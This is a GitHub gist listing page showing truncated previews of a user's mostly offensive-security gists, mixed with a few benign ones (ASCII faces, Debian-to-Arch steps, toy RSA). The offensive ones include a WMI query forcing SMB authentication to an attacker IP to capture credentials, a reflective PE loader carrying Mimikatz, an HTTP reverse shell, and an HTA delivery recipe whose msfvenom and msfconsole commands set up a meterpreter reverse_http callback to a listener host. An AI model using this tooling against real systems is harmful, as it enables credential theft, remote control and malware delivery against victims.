johnjohnsp1
johnjohnsp1
/ WMIQuery_SMBAuth.ps1
Created
December 18, 2015 04:03
— forked from mubix/WMIQuery_SMBAuth.ps1
Using a WMI Query to be able to capture credentials
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $share = "\\192.168.1.245\share" | |
| $query = "Associators of {win32_LogicalShareSecuritySetting='$share'}" | |
| Get-WmiObject -query $query | |
| <# | |
| Obtained using Impacket's SMBServer.py example | |
| Attacker: 192.168.1.245 | |
| Victim: 192.168.1.100 | |
| Result: |
johnjohnsp1
/ jsenroll.html
Created
December 30, 2015 19:04
Creates and Installs a Certificate in User Store - Windows -Work In Progress
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <script> | |
| function InvokeCreateCertificate(certSubject, isCA) | |
| { | |
| var CAsubject = certSubject; | |
| var dn = new ActiveXObject("X509Enrollment.CX500DistinguishedName"); | |
| dn.Encode( "CN=" + CAsubject, 0); | |
| var issuer = "__PoshRat_Trusted_Root"; |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.EnterpriseServices; | |
| using System.Collections.Generic; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Cryptography; |
johnjohnsp1
/ GetCoolFace.ps1
Created
January 12, 2016 15:42
— forked from dfinke/GetCoolFace.ps1
ᕙ༼ຈل͜ຈ༽ᕗ Get a cool ascii face
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # From: | |
| # https://github.com/maxogden/cool-ascii-faces | |
| function Get-CoolFace { | |
| param( | |
| $Count=1 | |
| ,[Switch]$All | |
| ) | |
| $faces = "( .-. )", |
johnjohnsp1
/ WMI_recon_and_attacks.ps1
Created
January 13, 2016 18:12
— forked from mattifestation/WMI_recon_and_attacks.ps1
BlueHat 2016 - WMI recon and attack demo
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ############# | |
| ### SETUP ### | |
| ############# | |
| # Set up remote session | |
| $Credential = Get-Credential TestUser | |
| $AdminCred = Get-Credential Administrator | |
| $SessionOption = New-CimSessionOption -Protocol Dcom | |
| $CimSession = New-CimSession -Credential $Credential -ComputerName TestPC -SessionOption $SessionOption | |
| $AdminCimSession = New-CimSession -Credential $AdminCred -ComputerName TestPC -SessionOption $SessionOption |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Author: Casey Smith @subTee | |
| License: BSD3-Clause | |
| .SYNOPSIS | |
| Simple Reverse Shell over HTTP. Execute Commands on Client. | |
johnjohnsp1
/ replace-debian-with-arch.txt
Created
January 28, 2016 17:52
— forked from m-ou-se/replace-debian-with-arch.txt
Instructions to replace a live Debian installation with Arch
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Download latest archlinux bootstrap package, see https://www.archlinux.org/download/ | |
| wget http://ftp.nluug.nl/os/Linux/distr/archlinux/iso/2016.01.01/archlinux-bootstrap-2016.01.01-x86_64.tar.gz | |
| # Make sure you'll have enough entropy for pacman-key later. | |
| apt-get install haveged | |
| # Install the arch bootstrap image in a tmpfs. | |
| mount -t tmpfs none /mnt | |
| cd /mnt | |
| tar xvf ~/archlinux-bootstrap-2016.01.01-x86_64.tar.gz --strip-components=1 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Created By Casey Smith | |
| @subTee | |
| RSA in PowerShell. | |
| Just Cause... | |
| Reference notes for the curious | |
| p = 61 <= first prime number (destroy this after computing e and d) | |
| q = 53 <= second prime number (destroy this after computing e and d) |
johnjohnsp1
/ PELoader.cs
Created
February 14, 2016 13:49
Reflective PE Loader - Compressed Mimikatz inside of InstallUtil
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.IO.Compression; | |
| using System.Text; | |
| using System.Collections.Generic; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <!-- | |
| Example By Casey Smith @subTee | |
| Generate Shellcode: | |
| msfvenom --payload windows/meterpreter/reverse_http LHOST=192.168.56.103 LPORT=8080 --format vba > msf.vba | |
| Wrap Shellcode in HTA | |
| Deliver | |
| Start Msf | |
| msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_http;set LPORT 8080;set LHOST 192.168.56.103;set ExitOnSession false; exploit -j" | |
| Wait for Shells to Rain |